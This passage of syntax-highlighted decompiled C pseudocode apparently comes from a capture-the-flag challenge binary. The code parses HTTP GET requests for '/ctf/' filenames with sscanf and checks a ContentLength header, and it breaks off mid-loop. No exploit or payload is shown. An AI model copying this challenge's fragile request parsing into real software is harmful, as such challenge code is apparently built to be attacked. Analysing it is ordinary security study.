</span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-280h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-27Ch] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-278h] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-274h] </span></span></span><span class="line"><span class="cl"> <span class="n">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-270h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-268h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s1</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+30h] [rbp-260h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-258h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v12</span><span class="p">;</span> <span class="c1">// [rsp+40h] [rbp-250h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v13</span><span class="p">;</span> <span class="c1">// [rsp+48h] [rbp-248h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v14</span><span class="p">;</span> <span class="c1">// [rsp+50h] [rbp-240h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v15</span><span class="p">;</span> <span class="c1">// [rsp+58h] [rbp-238h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v16</span><span class="p">;</span> <span class="c1">// [rsp+60h] [rbp-230h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v17</span><span class="p">;</span> <span class="c1">// [rsp+68h] [rbp-228h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+70h] [rbp-220h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v19</span><span class="p">;</span> <span class="c1">// [rsp+78h] [rbp-218h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v20</span><span class="p">;</span> <span class="c1">// [rsp+80h] [rbp-210h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v21</span><span class="p">;</span> <span class="c1">// [rsp+88h] [rbp-208h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v22</span><span class="p">;</span> <span class="c1">// [rsp+90h] [rbp-200h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v23</span><span class="p">;</span> <span class="c1">// [rsp+98h] [rbp-1F8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v24</span><span class="p">;</span> <span class="c1">// [rsp+A0h] [rbp-1F0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v25</span><span class="p">;</span> <span class="c1">// [rsp+A8h] [rbp-1E8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v26</span><span class="p">;</span> <span class="c1">// [rsp+B0h] [rbp-1E0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v27</span><span class="p">;</span> <span class="c1">// [rsp+B8h] [rbp-1D8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v28</span><span class="p">;</span> <span class="c1">// [rsp+C0h] [rbp-1D0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v29</span><span class="p">;</span> <span class="c1">// [rsp+C8h] [rbp-1C8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v30</span><span class="p">;</span> <span class="c1">// [rsp+D0h] [rbp-1C0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v31</span><span class="p">;</span> <span class="c1">// [rsp+D8h] [rbp-1B8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v32</span><span class="p">;</span> <span class="c1">// [rsp+E0h] [rbp-1B0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v33</span><span class="p">;</span> <span class="c1">// [rsp+E8h] [rbp-1A8h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">src</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+F0h] [rbp-1A0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v35</span><span class="p">;</span> <span class="c1">// [rsp+F8h] [rbp-198h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v36</span><span class="p">;</span> <span class="c1">// [rsp+100h] [rbp-190h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v37</span><span class="p">;</span> <span class="c1">// [rsp+108h] [rbp-188h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v38</span><span class="p">;</span> <span class="c1">// [rsp+110h] [rbp-180h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v39</span><span class="p">;</span> <span class="c1">// [rsp+118h] [rbp-178h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v40</span><span class="p">;</span> <span class="c1">// [rsp+120h] [rbp-170h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v41</span><span class="p">;</span> <span class="c1">// [rsp+128h] [rbp-168h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v42</span><span class="p">;</span> <span class="c1">// [rsp+130h] [rbp-160h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v43</span><span class="p">;</span> <span class="c1">// [rsp+138h] [rbp-158h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v44</span><span class="p">;</span> <span class="c1">// [rsp+140h] [rbp-150h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v45</span><span class="p">;</span> <span class="c1">// [rsp+148h] [rbp-148h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v46</span><span class="p">;</span> <span class="c1">// [rsp+150h] [rbp-140h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v47</span><span class="p">;</span> <span class="c1">// [rsp+158h] [rbp-138h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v48</span><span class="p">;</span> <span class="c1">// [rsp+160h] [rbp-130h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v49</span><span class="p">;</span> <span class="c1">// [rsp+168h] [rbp-128h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">v50</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+170h] [rbp-120h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v51</span><span class="p">;</span> <span class="c1">// [rsp+178h] [rbp-118h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v52</span><span class="p">;</span> <span class="c1">// [rsp+180h] [rbp-110h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v53</span><span class="p">;</span> <span class="c1">// [rsp+188h] [rbp-108h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v54</span><span class="p">;</span> <span class="c1">// [rsp+190h] [rbp-100h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v55</span><span class="p">;</span> <span class="c1">// [rsp+198h] [rbp-F8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v56</span><span class="p">;</span> <span class="c1">// [rsp+1A0h] [rbp-F0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v57</span><span class="p">;</span> <span class="c1">// [rsp+1A8h] [rbp-E8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v58</span><span class="p">;</span> <span class="c1">// [rsp+1B0h] [rbp-E0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v59</span><span class="p">;</span> <span class="c1">// [rsp+1B8h] [rbp-D8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v60</span><span class="p">;</span> <span class="c1">// [rsp+1C0h] [rbp-D0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v61</span><span class="p">;</span> <span class="c1">// [rsp+1C8h] [rbp-C8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v62</span><span class="p">;</span> <span class="c1">// [rsp+1D0h] [rbp-C0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v63</span><span class="p">;</span> <span class="c1">// [rsp+1D8h] [rbp-B8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v64</span><span class="p">;</span> <span class="c1">// [rsp+1E0h] [rbp-B0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v65</span><span class="p">;</span> <span class="c1">// [rsp+1E8h] [rbp-A8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v66</span><span class="p">;</span> <span class="c1">// [rsp+1F0h] [rbp-A0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v67</span><span class="p">;</span> <span class="c1">// [rsp+1F8h] [rbp-98h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v68</span><span class="p">;</span> <span class="c1">// [rsp+200h] [rbp-90h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v69</span><span class="p">;</span> <span class="c1">// [rsp+208h] [rbp-88h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v70</span><span class="p">;</span> <span class="c1">// [rsp+210h] [rbp-80h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v71</span><span class="p">;</span> <span class="c1">// [rsp+218h] [rbp-78h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v72</span><span class="p">;</span> <span class="c1">// [rsp+220h] [rbp-70h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v73</span><span class="p">;</span> <span class="c1">// [rsp+228h] [rbp-68h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v74</span><span class="p">;</span> <span class="c1">// [rsp+230h] [rbp-60h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v75</span><span class="p">;</span> <span class="c1">// [rsp+238h] [rbp-58h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v76</span><span class="p">;</span> <span class="c1">// [rsp+240h] [rbp-50h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v77</span><span class="p">;</span> <span class="c1">// [rsp+248h] [rbp-48h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v78</span><span class="p">;</span> <span class="c1">// [rsp+250h] [rbp-40h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v79</span><span class="p">;</span> <span class="c1">// [rsp+258h] [rbp-38h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v80</span><span class="p">;</span> <span class="c1">// [rsp+260h] [rbp-30h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v81</span><span class="p">;</span> <span class="c1">// [rsp+268h] [rbp-28h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v82</span><span class="p">;</span> <span class="c1">// [rsp+278h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v82</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">s1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v12</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v13</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v14</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v15</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v16</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v17</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">s</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v19</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v20</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v21</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v22</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v23</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v24</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v25</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">src</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v35</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v36</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v37</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v38</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v39</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v40</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v41</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v42</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v43</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v44</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v45</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v46</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v47</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v48</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v49</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v26</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v27</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v28</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v29</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v30</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v31</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v32</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v33</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">stream</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v50</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v51</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v52</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v53</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v54</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v55</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v56</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v57</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v58</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v59</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v60</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v61</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v62</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v63</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v64</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v65</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v66</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v67</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v68</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v69</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v70</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v71</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v72</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v73</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v74</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v75</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v76</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v77</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v78</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v79</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v80</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v81</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">clientid</span><span class="se">\&#34;</span><span class="s">:</span><span class="se">\&#34;</span><span class="s">%63[^</span><span class="se">\&#34;</span><span class="s">]</span><span class="se">\&#34;</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;httpclient&#34;</span><span class="p">)</span> <span class="p">)</span><span class="c1">// no httpclient </span></span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;GET /home/ctf/%63[^ </span><span class="se">\&#34;\r\n</span><span class="s">/]&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;GET %*[^/]/ctf/%63[^ </span><span class="se">\&#34;\r\n</span><span class="s">/]&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;GET %*s/ctf/</span><span class="se">\&#34;</span><span class="s">%63[^</span><span class="se">\&#34;</span><span class="s">]</span><span class="se">\&#34;</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="nf">strstr</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;/ctf/&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v9</span> <span class="o">=</span> <span class="nf">strstr</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;/ctf/&#34;</span><span class="p">)</span> <span class="o">+</span> <span class="mi">5</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">v9</span><span class="p">,</span> <span class="s">&#34;%63[^ </span><span class="se">\&#34;\r\n</span><span class="s">/]&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;GET %*s HTTP/1.1</span><span class="se">\r\n</span><span class="s">Host: %*s</span><span class="se">\r\n</span><span class="s">ContentLength: %d</span><span class="se">\r\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v4</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;find length: %d</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v4</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&gt;</span> <span class="n">v4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;file name length exceeds contentlength&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v4</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;contentlength too long&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;ContentLength not found&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&gt;=</span> <span class="nf">strlen</span><span class="p">(</span><span class="n">s</span><span 